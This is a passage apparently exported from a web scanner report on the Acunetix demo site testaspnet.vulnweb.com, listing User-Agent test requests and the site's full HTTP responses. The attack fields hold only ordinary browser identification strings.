style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Show / hide Request and Response
Request Header - size: 440 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:25 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Show / hide Request and Response
Request Header - size: 506 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:25 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV 